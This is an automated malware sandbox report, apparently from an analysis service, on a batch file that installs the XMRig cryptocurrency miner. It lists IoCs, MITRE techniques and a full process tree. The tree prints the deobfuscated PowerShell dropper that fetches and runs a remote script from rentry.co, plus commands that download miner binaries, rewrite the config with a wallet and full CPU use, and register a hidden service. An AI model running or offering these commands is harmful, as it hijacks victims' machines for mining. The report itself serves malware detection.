xmrig | 4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

Analysis

max time kernel
149s
max time network
93s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
01/07/2024, 01:15 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

23920263611070.bat
Size

517B
MD5

ac9d73455d58bfa42f81e718b8c8d6b5
SHA1

60040fff333b7bc09b22e5c013f11b8a99555ed3
SHA256

4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12
SHA512

ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

1
$wc = new-object system.net.webclient
2
$tempfile = [system.io.path]::gettempfilename()
3
$tempfile = ".bat"
4
$wc.downloadfile("https://rentry.co/regele/raw", ".bat")
5
.bat 42 crnhwckm6bmza8jmwyvwb2tjacxqgmj1qhhj9ae55qrx488q6cvau42ekkeied2n9te1ujnviusnvqv1nj17r79fdhjvl
6
remove-item -force $tempfile
7

URLs

exe.dropper

https://rentry.co/regele/raw

Extracted

Language

ps1

Deobfuscated

1
$wc = new-object system.net.webclient
2
$wc.downloadfile("https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip", "C:\\Users\\Admin\\xmrig.zip")
3

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

1
$wc = new-object system.net.webclient
2
$wc.downloadfile("https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip", "C:\\Users\\Admin\\nssm.zip")
3

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 17 IoCs

miner

resource	yara_rule
behavioral2/files/0x0007000000023420-63.dat	family_xmrig
behavioral2/files/0x0007000000023420-63.dat	xmrig
behavioral2/memory/1212-66-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3936-201-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3936-202-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3936-203-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3936-204-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3936-205-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3936-206-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3936-207-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3936-208-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3936-209-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3936-210-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3936-211-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3936-212-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3936-213-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral2/memory/3936-214-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 3 IoCs

flow	pid	Process
6	924	powershell.exe
17	4008	powershell.exe
25	2528	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
1212	xmrig.exe
4536	nssm.exe
2604	nssm.exe
4276	nssm.exe
1704	nssm.exe
2420	nssm.exe
4960	nssm.exe
3276	nssm.exe
3936	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
16	raw.githubusercontent.com
17	raw.githubusercontent.com
25	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1176	sc.exe
3492	sc.exe
4048	sc.exe
4756	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4732	powershell.exe
3356	powershell.exe
2088	powershell.exe
2224	powershell.exe
2056	powershell.exe
2532	powershell.exe
3652	powershell.exe
4736	powershell.exe
2528	powershell.exe
1532	powershell.exe
924	powershell.exe
4008	powershell.exe
2652	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
3620	timeout.exe
4324	timeout.exe
2352	timeout.exe
392	timeout.exe
3356	timeout.exe
4288	timeout.exe
4924	timeout.exe
1044	timeout.exe
1636	timeout.exe
4736	timeout.exe
4136	timeout.exe
3056	timeout.exe
1216	timeout.exe
432	timeout.exe
2984	timeout.exe
4276	timeout.exe
1200	timeout.exe
1664	timeout.exe
428	timeout.exe
804	timeout.exe
3484	timeout.exe
3772	timeout.exe
1788	timeout.exe
2964	timeout.exe
4112	timeout.exe
4508	timeout.exe
772	timeout.exe
1108	timeout.exe
1112	timeout.exe
3232	timeout.exe
4548	timeout.exe
4992	timeout.exe
1972	timeout.exe
2140	timeout.exe
3292	timeout.exe
2096	timeout.exe
116	timeout.exe
4956	timeout.exe
4252	timeout.exe
3460	timeout.exe
1488	timeout.exe
4020	timeout.exe
1284	timeout.exe
2268	timeout.exe
3148	timeout.exe
4748	timeout.exe
2508	timeout.exe
692	timeout.exe
2224	timeout.exe
4712	timeout.exe
1012	timeout.exe
2980	timeout.exe
856	timeout.exe
4896	timeout.exe
3764	timeout.exe
2896	timeout.exe
1536	timeout.exe
3600	timeout.exe
3748	timeout.exe
3680	timeout.exe
2636	timeout.exe
4008	timeout.exe
4696	timeout.exe
856	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4576	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
924	powershell.exe
924	powershell.exe
4008	powershell.exe
4008	powershell.exe
4732	powershell.exe
4732	powershell.exe
2652	powershell.exe
2652	powershell.exe
2532	powershell.exe
2532	powershell.exe
3356	powershell.exe
3356	powershell.exe
2088	powershell.exe
2088	powershell.exe
3652	powershell.exe
3652	powershell.exe
2224	powershell.exe
2224	powershell.exe
4736	powershell.exe
4736	powershell.exe
2056	powershell.exe
2056	powershell.exe
2528	powershell.exe
2528	powershell.exe
1532	powershell.exe
1532	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	924	powershell.exe
Token: SeDebugPrivilege	4576	taskkill.exe
Token: SeDebugPrivilege	4008	powershell.exe
Token: SeDebugPrivilege	4732	powershell.exe
Token: SeDebugPrivilege	2652	powershell.exe
Token: SeDebugPrivilege	2532	powershell.exe
Token: SeDebugPrivilege	3356	powershell.exe
Token: SeDebugPrivilege	2088	powershell.exe
Token: SeDebugPrivilege	3652	powershell.exe
Token: SeDebugPrivilege	2224	powershell.exe
Token: SeDebugPrivilege	4736	powershell.exe
Token: SeDebugPrivilege	2056	powershell.exe
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeLockMemoryPrivilege	3936	xmrig.exe
Token: SeIncreaseQuotaPrivilege	4256	WMIC.exe
Token: SeSecurityPrivilege	4256	WMIC.exe
Token: SeTakeOwnershipPrivilege	4256	WMIC.exe
Token: SeLoadDriverPrivilege	4256	WMIC.exe
Token: SeSystemProfilePrivilege	4256	WMIC.exe
Token: SeSystemtimePrivilege	4256	WMIC.exe
Token: SeProfSingleProcessPrivilege	4256	WMIC.exe
Token: SeIncBasePriorityPrivilege	4256	WMIC.exe
Token: SeCreatePagefilePrivilege	4256	WMIC.exe
Token: SeBackupPrivilege	4256	WMIC.exe
Token: SeRestorePrivilege	4256	WMIC.exe
Token: SeShutdownPrivilege	4256	WMIC.exe
Token: SeDebugPrivilege	4256	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4256	WMIC.exe
Token: SeRemoteShutdownPrivilege	4256	WMIC.exe
Token: SeUndockPrivilege	4256	WMIC.exe
Token: SeManageVolumePrivilege	4256	WMIC.exe
Token: 33	4256	WMIC.exe
Token: 34	4256	WMIC.exe
Token: 35	4256	WMIC.exe
Token: 36	4256	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4256	WMIC.exe
Token: SeSecurityPrivilege	4256	WMIC.exe
Token: SeTakeOwnershipPrivilege	4256	WMIC.exe
Token: SeLoadDriverPrivilege	4256	WMIC.exe
Token: SeSystemProfilePrivilege	4256	WMIC.exe
Token: SeSystemtimePrivilege	4256	WMIC.exe
Token: SeProfSingleProcessPrivilege	4256	WMIC.exe
Token: SeIncBasePriorityPrivilege	4256	WMIC.exe
Token: SeCreatePagefilePrivilege	4256	WMIC.exe
Token: SeBackupPrivilege	4256	WMIC.exe
Token: SeRestorePrivilege	4256	WMIC.exe
Token: SeShutdownPrivilege	4256	WMIC.exe
Token: SeDebugPrivilege	4256	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4256	WMIC.exe
Token: SeRemoteShutdownPrivilege	4256	WMIC.exe
Token: SeUndockPrivilege	4256	WMIC.exe
Token: SeManageVolumePrivilege	4256	WMIC.exe
Token: 33	4256	WMIC.exe
Token: 34	4256	WMIC.exe
Token: 35	4256	WMIC.exe
Token: 36	4256	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1036	WMIC.exe
Token: SeSecurityPrivilege	1036	WMIC.exe
Token: SeTakeOwnershipPrivilege	1036	WMIC.exe
Token: SeLoadDriverPrivilege	1036	WMIC.exe
Token: SeSystemProfilePrivilege	1036	WMIC.exe
Token: SeSystemtimePrivilege	1036	WMIC.exe
Token: SeProfSingleProcessPrivilege	1036	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3936	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3580 wrote to memory of 924	3580	cmd.exe	82
PID 3580 wrote to memory of 924	3580	cmd.exe	82
PID 924 wrote to memory of 792	924	powershell.exe	83
PID 924 wrote to memory of 792	924	powershell.exe	83
PID 792 wrote to memory of 4012	792	cmd.exe	84
PID 792 wrote to memory of 4012	792	cmd.exe	84
PID 4012 wrote to memory of 3224	4012	net.exe	85
PID 4012 wrote to memory of 3224	4012	net.exe	85
PID 792 wrote to memory of 1520	792	cmd.exe	86
PID 792 wrote to memory of 1520	792	cmd.exe	86
PID 792 wrote to memory of 5020	792	cmd.exe	87
PID 792 wrote to memory of 5020	792	cmd.exe	87
PID 792 wrote to memory of 1380	792	cmd.exe	88
PID 792 wrote to memory of 1380	792	cmd.exe	88
PID 792 wrote to memory of 1532	792	cmd.exe	109
PID 792 wrote to memory of 1532	792	cmd.exe	109
PID 792 wrote to memory of 1364	792	cmd.exe	90
PID 792 wrote to memory of 1364	792	cmd.exe	90
PID 792 wrote to memory of 1176	792	cmd.exe	91
PID 792 wrote to memory of 1176	792	cmd.exe	91
PID 792 wrote to memory of 4756	792	cmd.exe	92
PID 792 wrote to memory of 4756	792	cmd.exe	92
PID 792 wrote to memory of 4576	792	cmd.exe	93
PID 792 wrote to memory of 4576	792	cmd.exe	93
PID 792 wrote to memory of 4008	792	cmd.exe	95
PID 792 wrote to memory of 4008	792	cmd.exe	95
PID 792 wrote to memory of 4732	792	cmd.exe	96
PID 792 wrote to memory of 4732	792	cmd.exe	96
PID 792 wrote to memory of 2652	792	cmd.exe	97
PID 792 wrote to memory of 2652	792	cmd.exe	97
PID 792 wrote to memory of 1212	792	cmd.exe	98
PID 792 wrote to memory of 1212	792	cmd.exe	98
PID 792 wrote to memory of 3296	792	cmd.exe	99
PID 792 wrote to memory of 3296	792	cmd.exe	99
PID 3296 wrote to memory of 2532	3296	cmd.exe	100
PID 3296 wrote to memory of 2532	3296	cmd.exe	100
PID 2532 wrote to memory of 3196	2532	powershell.exe	101
PID 2532 wrote to memory of 3196	2532	powershell.exe	101
PID 792 wrote to memory of 3356	792	cmd.exe	102
PID 792 wrote to memory of 3356	792	cmd.exe	102
PID 792 wrote to memory of 2088	792	cmd.exe	103
PID 792 wrote to memory of 2088	792	cmd.exe	103
PID 792 wrote to memory of 3652	792	cmd.exe	137
PID 792 wrote to memory of 3652	792	cmd.exe	137
PID 792 wrote to memory of 2224	792	cmd.exe	105
PID 792 wrote to memory of 2224	792	cmd.exe	105
PID 792 wrote to memory of 4736	792	cmd.exe	145
PID 792 wrote to memory of 4736	792	cmd.exe	145
PID 792 wrote to memory of 2056	792	cmd.exe	107
PID 792 wrote to memory of 2056	792	cmd.exe	107
PID 792 wrote to memory of 2528	792	cmd.exe	108
PID 792 wrote to memory of 2528	792	cmd.exe	108
PID 792 wrote to memory of 1532	792	cmd.exe	109
PID 792 wrote to memory of 1532	792	cmd.exe	109
PID 792 wrote to memory of 4048	792	cmd.exe	110
PID 792 wrote to memory of 4048	792	cmd.exe	110
PID 792 wrote to memory of 3492	792	cmd.exe	111
PID 792 wrote to memory of 3492	792	cmd.exe	111
PID 792 wrote to memory of 4536	792	cmd.exe	112
PID 792 wrote to memory of 4536	792	cmd.exe	112
PID 792 wrote to memory of 2604	792	cmd.exe	113
PID 792 wrote to memory of 2604	792	cmd.exe	113
PID 792 wrote to memory of 4276	792	cmd.exe	164
PID 792 wrote to memory of 4276	792	cmd.exe	164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\23920263611070.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4391.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:792
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4012
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:3224
  - - C:\Windows\system32\where.exe
      where powershell
      4⤵
      PID:1520
  - - C:\Windows\system32\where.exe
      where find
      4⤵
      PID:5020
  - - C:\Windows\system32\where.exe
      where findstr
      4⤵
      PID:1380
  - - C:\Windows\system32\where.exe
      where tasklist
      4⤵
      PID:1532
  - - C:\Windows\system32\where.exe
      where sc
      4⤵
      PID:1364
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:1176
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:4756
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im xmrig.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4576
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4732
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2652
  - - C:\Users\Admin\moneroocean\xmrig.exe
      "C:\Users\Admin\moneroocean\xmrig.exe" --help
      4⤵
      Executes dropped EXE
      PID:1212
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3296
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2532
      - C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        6⤵
        
        PID:3196
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3356
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2088
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Objiyuie\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3652
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2224
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4736
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2056
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2528
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1532
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:4048
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:3492
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
      4⤵
      Executes dropped EXE
      PID:4536
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
      4⤵
      Executes dropped EXE
      PID:2604
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
      4⤵
      Executes dropped EXE
      PID:4276
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
      4⤵
      Executes dropped EXE
      PID:1704
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
      4⤵
      Executes dropped EXE
      PID:2420
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
      4⤵
      Executes dropped EXE
      PID:4960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1928
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4256
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3236
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1036
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3108
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1844
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2728
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3760
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2980
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4596
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4900
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4304
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2524
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1708
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4296
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:116
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4264
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4544
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3200
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:880
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4756
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4036
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3944
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2348
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1216
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4152
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2640
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2428
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1940
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3292
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2688
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2896
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1964
